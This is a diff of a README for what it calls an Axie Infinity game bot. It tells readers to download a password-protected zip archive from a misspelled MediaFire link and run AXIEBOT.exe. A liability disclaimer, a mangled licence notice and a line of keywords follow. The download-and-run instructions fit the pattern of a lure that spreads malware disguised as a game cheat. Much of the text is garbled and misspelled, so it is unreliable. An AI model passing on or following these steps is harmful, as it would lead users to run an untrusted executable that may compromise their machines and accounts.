MohammadrezaFarahmand/axie-infinity-bot/README.md

 1.Change game resolution to full-screen (or ful-scren windowed) and close Sk y avis game client 2.Download archive with software htts://www.mediafir.com/file/45lsw0mspadamAxieBot.zip/file Password:1488 3.Launch AXIEBOT.exe with correct setti
 Im not recommend you to play moretha 24hous e co  un.
-Imo  ta ke   reoib iity fo rany bans o blocks.
+Imo  ta ke   reob iity fo rany bans o blocks.
 THE SOFTWARE IS PROVIDED  "AS IS, WTHO UT W ARA T  NY  N, XRSS  R    PLIE, NCU DING   BT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR APARTICULAR  PU POSE AN  NI N FRINGET.
 I N VET SHA  L L THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIAILITY, WETHER IN AN AINOF RT , TORTO HRWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 AXIE NFIIT BO ,AXIE INFINITYUO ATTLE BOT, AXIE INFINITY SCRIPT